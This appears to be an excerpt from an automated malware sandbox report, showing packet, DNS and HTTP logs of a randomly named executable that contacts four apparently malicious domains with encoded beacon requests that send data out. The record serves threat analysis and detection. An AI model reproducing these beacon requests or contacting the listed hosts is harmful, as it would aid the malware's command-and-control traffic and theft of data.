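For the two flows included, the alert lands roughly 0.7 to 1.0 s after the client's first packet: the signature matches on the HTTP request or response, not on the handshake, so a flow record keyed on the SYN time will sit slightly earlier than the IDS event for the same connection.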
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Aug 29, 2024 12:15:38.454984903 CEST | 55084 | 80 | 192.168.2.5 | 188.114.96.3 |
| Aug 29, 2024 12:15:38.459816933 CEST | 80 | 55084 | 188.114.96.3 | 192.168.2.5 |
| Aug 29, 2024 12:15:38.459935904 CEST | 55084 | 80 | 192.168.2.5 | 188.114.96.3 |
| Aug 29, 2024 12:15:38.468339920 CEST | 55084 | 80 | 192.168.2.5 | 188.114.96.3 |
| Aug 29, 2024 12:15:38.473429918 CEST | 80 | 55084 | 188.114.96.3 | 192.168.2.5 |
| Aug 29, 2024 12:15:39.466732025 CEST | 80 | 55084 | 188.114.96.3 | 192.168.2.5 |
| Aug 29, 2024 12:15:39.466891050 CEST | 80 | 55084 | 188.114.96.3 | 192.168.2.5 |
| Aug 29, 2024 12:15:39.466902971 CEST | 80 | 55084 | 188.114.96.3 | 192.168.2.5 |
| Aug 29, 2024 12:15:39.466976881 CEST | 55084 | 80 | 192.168.2.5 | 188.114.96.3 |
| Aug 29, 2024 12:15:39.467830896 CEST | 80 | 55084 | 188.114.96.3 | 192.168.2.5 |
| Aug 29, 2024 12:15:39.467844009 CEST | 80 | 55084 | 188.114.96.3 | 192.168.2.5 |
| Aug 29, 2024 12:15:39.467999935 CEST | 55084 | 80 | 192.168.2.5 | 188.114.96.3 |
| Aug 29, 2024 12:15:39.468730927 CEST | 80 | 55084 | 188.114.96.3 | 192.168.2.5 |
| Aug 29, 2024 12:15:39.468744993 CEST | 80 | 55084 | 188.114.96.3 | 192.168.2.5 |
| Aug 29, 2024 12:15:39.468810081 CEST | 55084 | 80 | 192.168.2.5 | 188.114.96.3 |
| Aug 29, 2024 12:15:39.469280005 CEST | 80 | 55084 | 188.114.96.3 | 192.168.2.5 |
| Aug 29, 2024 12:15:39.469342947 CEST | 55084 | 80 | 192.168.2.5 | 188.114.96.3 |
| Aug 29, 2024 12:15:39.474247932 CEST | 55084 | 80 | 192.168.2.5 | 188.114.96.3 |
| Aug 29, 2024 12:15:39.479047060 CEST | 80 | 55084 | 188.114.96.3 | 192.168.2.5 |
| Aug 29, 2024 12:15:54.607157946 CEST | 55085 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:54.612019062 CEST | 80 | 55085 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:15:54.612114906 CEST | 55085 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:54.623213053 CEST | 55085 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:54.628010988 CEST | 80 | 55085 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:15:55.290220022 CEST | 80 | 55085 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:15:55.290385008 CEST | 80 | 55085 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:15:55.290457010 CEST | 55085 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:56.126255989 CEST | 55085 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:57.147192955 CEST | 55086 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:57.159696102 CEST | 80 | 55086 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:15:57.159790039 CEST | 55086 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:57.171835899 CEST | 55086 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:57.176717043 CEST | 80 | 55086 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:15:57.838479042 CEST | 80 | 55086 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:15:57.839629889 CEST | 80 | 55086 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:15:57.839714050 CEST | 55086 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:58.673082113 CEST | 55086 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:59.692096949 CEST | 55087 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:59.700634003 CEST | 80 | 55087 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:15:59.700752974 CEST | 55087 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:59.711415052 CEST | 55087 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:15:59.716521978 CEST | 80 | 55087 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:15:59.717113972 CEST | 80 | 55087 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:16:00.487427950 CEST | 80 | 55087 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:16:00.487692118 CEST | 80 | 55087 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:16:00.487795115 CEST | 55087 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:16:01.219878912 CEST | 55087 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:16:02.242301941 CEST | 55088 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:16:02.247334003 CEST | 80 | 55088 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:16:02.247545004 CEST | 55088 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:16:02.255439997 CEST | 55088 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:16:02.260406017 CEST | 80 | 55088 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:16:02.915963888 CEST | 80 | 55088 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:16:02.916371107 CEST | 80 | 55088 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:16:02.916429996 CEST | 55088 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:16:02.918904066 CEST | 55088 | 80 | 192.168.2.5 | 195.110.124.133 |
| Aug 29, 2024 12:16:02.923830032 CEST | 80 | 55088 | 195.110.124.133 | 192.168.2.5 |
| Aug 29, 2024 12:16:07.986629963 CEST | 55089 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:07.991471052 CEST | 80 | 55089 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:07.991614103 CEST | 55089 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:08.003076077 CEST | 55089 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:08.008053064 CEST | 80 | 55089 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:08.467814922 CEST | 80 | 55089 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:08.467911005 CEST | 55089 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:09.516776085 CEST | 55089 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:09.523742914 CEST | 80 | 55089 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:10.535487890 CEST | 55090 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:10.545139074 CEST | 80 | 55090 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:10.545234919 CEST | 55090 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:10.557533026 CEST | 55090 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:10.562668085 CEST | 80 | 55090 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:11.026969910 CEST | 80 | 55090 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:11.027128935 CEST | 55090 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:12.063739061 CEST | 55090 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:12.068711042 CEST | 80 | 55090 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:13.082667112 CEST | 55091 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:13.087553978 CEST | 80 | 55091 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:13.087703943 CEST | 55091 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:13.098757982 CEST | 55091 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:13.103595018 CEST | 80 | 55091 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:13.103732109 CEST | 80 | 55091 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:13.542954922 CEST | 80 | 55091 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:13.543046951 CEST | 55091 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:14.610518932 CEST | 55091 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:14.616497993 CEST | 80 | 55091 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:15.629750967 CEST | 55092 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:15.634846926 CEST | 80 | 55092 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:15.634994984 CEST | 55092 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:15.642644882 CEST | 55092 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:15.647578955 CEST | 80 | 55092 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:16.092195988 CEST | 80 | 55092 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:16.092581987 CEST | 80 | 55092 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:16.092689037 CEST | 55092 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:16.092803001 CEST | 80 | 55092 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:16.093839884 CEST | 80 | 55092 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:16.093852997 CEST | 80 | 55092 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:16.093884945 CEST | 55092 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:16.095926046 CEST | 80 | 55092 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:16.095940113 CEST | 80 | 55092 | 84.32.84.32 | 192.168.2.5 |
| Aug 29, 2024 12:16:16.096008062 CEST | 55092 | 80 | 192.168.2.5 | 84.32.84.32 |
| Aug 29, 2024 12:16:16.098018885 CEST | 80 | 55092 | 84.32.84.32 | 192.168.2.5 |
                    Aug 29, 2024 12:16:16.098032951 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.098043919 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.098059893 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:16.098078012 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:16.098119020 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:16.127548933 CEST5509280192.168.2.584.32.84.32
                    Aug 29, 2024 12:16:16.132344961 CEST805509284.32.84.32192.168.2.5
                    Aug 29, 2024 12:16:21.327559948 CEST5509380192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:21.334911108 CEST805509366.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:21.335092068 CEST5509380192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:21.346313000 CEST5509380192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:21.351694107 CEST805509366.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:22.860492945 CEST5509380192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:22.905553102 CEST805509366.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:23.879858017 CEST5509480192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:23.886892080 CEST805509466.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:23.887072086 CEST5509480192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:23.901017904 CEST5509480192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:23.905822992 CEST805509466.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:25.407495975 CEST5509480192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:25.457672119 CEST805509466.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:26.785881042 CEST5509580192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:27.069818974 CEST805509566.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:27.069945097 CEST5509580192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:27.081561089 CEST5509580192.168.2.566.81.203.200
                    Aug 29, 2024 12:16:27.086483955 CEST805509566.81.203.200192.168.2.5
                    Aug 29, 2024 12:16:27.088053942 CEST805509566.81.203.200192.168.2.5
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Aug 29, 2024 12:14:54.634563923 CEST | 53 | 55832 | 162.159.36.2 | 192.168.2.5
                    Aug 29, 2024 12:14:55.115267038 CEST | 55738 | 53 | 192.168.2.5 | 1.1.1.1
                    Aug 29, 2024 12:14:55.128163099 CEST | 53 | 55738 | 1.1.1.1 | 192.168.2.5
                    Aug 29, 2024 12:15:38.309151888 CEST | 57081 | 53 | 192.168.2.5 | 1.1.1.1
                    Aug 29, 2024 12:15:38.445981979 CEST | 53 | 57081 | 1.1.1.1 | 192.168.2.5
                    Aug 29, 2024 12:15:54.536174059 CEST | 63711 | 53 | 192.168.2.5 | 1.1.1.1
                    Aug 29, 2024 12:15:54.604605913 CEST | 53 | 63711 | 1.1.1.1 | 192.168.2.5
                    Aug 29, 2024 12:16:07.927151918 CEST | 65221 | 53 | 192.168.2.5 | 1.1.1.1
                    Aug 29, 2024 12:16:07.983866930 CEST | 53 | 65221 | 1.1.1.1 | 192.168.2.5
                    Aug 29, 2024 12:16:21.145703077 CEST | 52229 | 53 | 192.168.2.5 | 1.1.1.1
                    Aug 29, 2024 12:16:21.324667931 CEST | 53 | 52229 | 1.1.1.1 | 192.168.2.5
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Aug 29, 2024 12:14:55.115267038 CEST | 192.168.2.5 | 1.1.1.1 | 0x1353 | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                    Aug 29, 2024 12:15:38.309151888 CEST | 192.168.2.5 | 1.1.1.1 | 0xd983 | Standard query (0) | www.chinaen.org | A (IP address) | IN (0x0001) | false
                    Aug 29, 2024 12:15:54.536174059 CEST | 192.168.2.5 | 1.1.1.1 | 0xc746 | Standard query (0) | www.marcoiozia.info | A (IP address) | IN (0x0001) | false
                    Aug 29, 2024 12:16:07.927151918 CEST | 192.168.2.5 | 1.1.1.1 | 0x98ae | Standard query (0) | www.godoggyonbase.online | A (IP address) | IN (0x0001) | false
                    Aug 29, 2024 12:16:21.145703077 CEST | 192.168.2.5 | 1.1.1.1 | 0x57d8 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Aug 29, 2024 12:14:55.128163099 CEST | 1.1.1.1 | 192.168.2.5 | 0x1353 | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                    Aug 29, 2024 12:15:38.445981979 CEST | 1.1.1.1 | 192.168.2.5 | 0xd983 | No error (0) | www.chinaen.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                    Aug 29, 2024 12:15:38.445981979 CEST | 1.1.1.1 | 192.168.2.5 | 0xd983 | No error (0) | www.chinaen.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                    Aug 29, 2024 12:15:54.604605913 CEST | 1.1.1.1 | 192.168.2.5 | 0xc746 | No error (0) | www.marcoiozia.info | marcoiozia.info | | CNAME (Canonical name) | IN (0x0001) | false
                    Aug 29, 2024 12:15:54.604605913 CEST | 1.1.1.1 | 192.168.2.5 | 0xc746 | No error (0) | marcoiozia.info | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
                    Aug 29, 2024 12:16:07.983866930 CEST | 1.1.1.1 | 192.168.2.5 | 0x98ae | No error (0) | www.godoggyonbase.online | godoggyonbase.online | | CNAME (Canonical name) | IN (0x0001) | false
                    Aug 29, 2024 12:16:07.983866930 CEST | 1.1.1.1 | 192.168.2.5 | 0x98ae | No error (0) | godoggyonbase.online | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
                    Aug 29, 2024 12:16:21.324667931 CEST | 1.1.1.1 | 192.168.2.5 | 0x57d8 | No error (0) | www.mediaplug.biz | | 66.81.203.200 | A (IP address) | IN (0x0001) | false
                    Aug 29, 2024 12:16:21.324667931 CEST | 1.1.1.1 | 192.168.2.5 | 0x57d8 | No error (0) | www.mediaplug.biz | | 66.81.203.135 | A (IP address) | IN (0x0001) | false
                    Aug 29, 2024 12:16:21.324667931 CEST | 1.1.1.1 | 192.168.2.5 | 0x57d8 | No error (0) | www.mediaplug.biz | | 66.81.203.10 | A (IP address) | IN (0x0001) | false
                    • www.chinaen.org
                    • www.marcoiozia.info
                    • www.godoggyonbase.online
                    • www.mediaplug.biz
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.5 | 55084 | 188.114.96.3 | 80 | 6584 | C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Aug 29, 2024 12:15:38.468339920 CEST | 497 | OUT | GET /zt7d/?QpGDsvFp=KcI7zOUatYggDJ3AV9ydt+9IOITQmx5DA5xygALe8uDfsJvPSx2pTS8MbER0fEeW+0g1hrhWUIgkLG8bo3rrAlPfGKh0dC1LPhQcHC1DvDFG/ug/vgNVnHXaPgixFLXzAw==&en=KRMtj8Zx1f- HTTP/1.1
                    Host: www.chinaen.org
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Aug 29, 2024 12:15:39.466732025 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 29 Aug 2024 10:15:39 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Product: Z-BlogPHP 1.7.3
                    X-XSS-Protection: 1; mode=block
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrAgzzFouJWtkbC1qarmqV8q4bD9HMroakga3SKJfMkUVYL3CIxfboisvzOEs1LNVf5JC6ULuYJ%2FqsJfM%2FxFQFbwzR1cAkz1EUxzW5oXVEQi%2FjD1XlMD2jF1aSYg3KdVk%2BE%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8babc7f3ee497ce2-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 31 64 31 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 21 20 e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e9 a1 b5 e9 9d a2 e6 9c aa [TRUNCATED]
                    Data Ascii: 1d1b<!doctype html><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device"content="pc,mobile"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><title>404! - </title><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css" rel="stylesheet"><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-
                    Aug 29, 2024 12:15:39.466891050 CEST | 1236 | IN | Data Raw: 34 2e 33 2e 33 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74
                    Data Ascii: 4.3.3.min.css" rel="stylesheet"><link rel="stylesheet" type="text/css" href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css" /><link rel="stylesheet" type="text/css" href="http://www.chinaen.org/zb_users/theme/yd1
                    Aug 29, 2024 12:15:39.466902971 CEST | 1236 | IN | Data Raw: 75 6c 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 09 09 09 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65
                    Data Ascii: ul></div><div class="login"><a rel="nofollow" href="http://www.chinaen.org/zb_system/login.php" target="_blank"></a></div><div class="search"><form name="search" method="get" action="http://www.chinaen.org/search.ph
                    Aug 29, 2024 12:15:39.467830896 CEST | 1236 | IN | Data Raw: e8 80 80 e6 94 bb e7 95 a5 e4 b9 8b e5 ae b6 22 3e e8 bf 94 e5 9b 9e e9 a6 96 e9 a1 b5 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 09 3c 21 2d 2d 20 6d 61 69 6e
                    Data Ascii: "></a></div></div></div></div>... main_side --><div class="main_side"> <div class="widget widget_previous"><div class="title"></div><ul><li><a h
                    Aug 29, 2024 12:15:39.467844009 CEST | 1236 | IN | Data Raw: e7 8e a9 e8 bf 99 e6 a0 b7 e5 ad 90 e7 9a 84 e5 90 a7 20 22 3e 31 30 76 31 30 e6 89 93 e9 87 8e e5 b0 b1 e7 8e a9 e8 bf 99 e6 a0 b7 e5 ad 90 e7 9a 84 e5 90 a7 20 3c 2f 61 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 34 e5 a4 a9 e5 89 8d 3c 2f 73 70
                    Data Ascii: ">10v10 </a><span>4</span></li><li><a href="http://www.chinaen.org/lol/199.html" target="_blank" title="[JR]
                    Aug 29, 2024 12:15:39.468730927 CEST | 1236 | IN | Data Raw: 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 e8 8d 89 e5 8f b0 e7 8f ad e5 ad 90 e6 95 85 e6 84 8f e7 9a 84 e5 90 a7 ef bc 8c e6 98 af e4 b8 8d e6 98 af e4 b8 80 e6 95 b4 e7 ae b1 e9 83 bd e6 98 af e4 b8 80 e8 af ba 20 22 3e e8 8d 89 e5 8f b0 e7 8f
                    Data Ascii: blank" title=" "> </a><span>6</span></li></ul></div><div class="widget widget_catalog"><div clas
                    Aug 29, 2024 12:15:39.468744993 CEST | 713 | IN | Data Raw: 20 31 30 2c 7d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 24 2e 69 61 73 28 7b 0d 0a 20 20 74 68 72 65 73 68 6f 6c 64 4d 61 72 67 69 6e 3a 20 2d 31 30 30 2c 0d 0a 20 20 74 72 69 67 67 65 72 50 61 67 65 54 68 72 65 73 68 6f
                    Data Ascii: 10,});});</script><script>$.ias({ thresholdMargin: -100, triggerPageThreshold: 3, history: false, container: '#infinitescroll', // item: '.infinitescroll_li', // pagination: '.pagebar', // ne


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.5 | 55085 | 195.110.124.133 | 80 | 6584 | C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Aug 29, 2024 12:15:54.623213053 CEST | 765 | OUT | POST /6u21/ HTTP/1.1
                    Host: www.marcoiozia.info
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.marcoiozia.info
                    Cache-Control: max-age=0
                    Content-Length: 209
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.marcoiozia.info/6u21/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 58 4a 58 59 51 55 57 2b 6a 47 2b 2b 62 77 57 72 6e 4b 62 51 65 72 51 44 63 7a 77 30 66 4c 77 71 4c 2b 43 64 44 77 77 45 4b 59 46 50 4a 42 43 49 4e 6b 49 79 32 49 59 71 38 39 4e 45 68 74 62 30 55 54 73 6f 62 6e 44 64 56 39 32 58 74 47 41 5a 78 44 64 6a 64 44 70 59 67 34 2b 66 4e 76 77 51 54 2b 35 70 73 4f 4e 58 73 6b 78 6a 43 2b 32 63 54 62 34 75 37 2f 30 48 71 2b 42 4e 64 4d 57 53 4a 38 4a 39 30 49 75 78 77 35 4f 75 61 2b 6d 6e 7a 6a 78 31 35 75 35 64 75 6c 6b 33 66 43 58 33 38 46 41 74 49 72 33 6b 4a 2b 66 53 59 77 58 44 68 39 33 77 33 6c 39 2b 36 57 4d 4f 6f 35 78 78 33 4f 52 5a 73 2f 63 3d
                    Data Ascii: QpGDsvFp=XJXYQUW+jG++bwWrnKbQerQDczw0fLwqL+CdDwwEKYFPJBCINkIy2IYq89NEhtb0UTsobnDdV92XtGAZxDdjdDpYg4+fNvwQT+5psONXskxjC+2cTb4u7/0Hq+BNdMWSJ8J90Iuxw5Oua+mnzjx15u5dulk3fCX38FAtIr3kJ+fSYwXDh93w3l9+6WMOo5xx3ORZs/c=
                    Aug 29, 2024 12:15:55.290220022 CEST | 367 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 29 Aug 2024 10:15:55 GMT
                    Server: Apache
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
